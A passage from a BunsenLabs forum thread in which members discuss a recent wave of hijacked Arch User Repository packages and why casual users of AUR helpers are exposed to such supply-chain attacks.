![[BunsenLabs Logo]](/img/bl.svg)
You are not logged in.
- Topics: Active | Unanswered
#301 2026-05-19 22:20:49
- PackRat
- jgmenu user Numero Uno
- Registered: 2015-10-02
- Posts: 2,958
Re: News that might affect BunsenLabs
You must unlearn what you have learned.
-- yoda
Online
#302 2026-05-20 02:46:48
- johnraff
- nullglob
- From: Nagoya, Japan
- Registered: 2015-09-09
- Posts: 13,312
- Website
Re: News that might affect BunsenLabs
^interesting!
...elevator in the Brain Hotel, broken down but just as well...
( a boring Japan blog (currently paused), now on Bluesky, there's also some GitStuff )
Offline
#303 Today 10:48:36
- Pinhead
- Member
- Registered: 2022-12-05
- Posts: 116
Re: News that might affect BunsenLabs
Complete the pattern, solve the puzzle, turn the key.
Offline
#304 Today 16:11:01
- hhh
- Miss Grace Jones
- From: Jamaica/Paris/NY
- Registered: 2015-09-17
- Posts: 17,159
- Website
Re: News that might affect BunsenLabs
Anyone know why Arch is getting targeted for exploits all of a sudden?
The future arrived. Read the terms and conditions.
Offline
#305 Today 16:33:06
- PackRat
- jgmenu user Numero Uno
- Registered: 2015-10-02
- Posts: 2,958
Re: News that might affect BunsenLabs
Anyone know why Arch is getting targeted for exploits all of a sudden?
Because they can would be my guess. The AUR has a large user base and has always been a relatively easy and tempting target. Maximum damage.
And it's worth noting it's not Arch per se that is having issues, it's the AUR. The Arch devs have always been quick to point out the risks:
The AUR is just popular with a lot of users that treat it like just another repo; and the AUR helpers make it easy to use.
Similar mindset in users that add a ppa to Ubuntu, or worse, Debian and start installing packages.
You must unlearn what you have learned.
-- yoda
Online
#306 Today 17:58:52
- hhh
- Miss Grace Jones
- From: Jamaica/Paris/NY
- Registered: 2015-09-17
- Posts: 17,159
- Website
Re: News that might affect BunsenLabs
I see. I always wondered about AUR security, but to be fair the users are quite savvy which is why this was caught so quickly.
Sonatype's first write-up counted more than 20 hijacked packages. Within a day, community trackers and the Arch aur-general thread had cataloged over 400, with one master list compiled by grepping the AUR git mirror, putting it around 408, and consolidated lists climbing higher.
The future arrived. Read the terms and conditions.
Offline
#307 Today 18:54:18
- PackRat
- jgmenu user Numero Uno
- Registered: 2015-10-02
- Posts: 2,958
Re: News that might affect BunsenLabs
I see. I always wondered about AUR security, but to be fair the users are quite savvy which is why this was caught so quickly.
Sonatype's first write-up counted more than 20 hijacked packages. Within a day, community trackers and the Arch aur-general thread had cataloged over 400, with one master list compiled by grepping the AUR git mirror, putting it around 408, and consolidated lists climbing higher.
I don't think that's valid any more. Maybe back when #! was popular and Arch was the distro for intermediate/advanced users. The rise of the user-friendly Arch installers and AUR helpers really increased the access for everyday users. The usual dual-edged sword argument; both the savvy and non-savvy could get an Arch system installed no problem and then start installing from the AUR. Even the popular Arch-based Manjaro has borked the AUR unintentionally a couple of times. Imagine if they tried.
You must unlearn what you have learned.
-- yoda
Online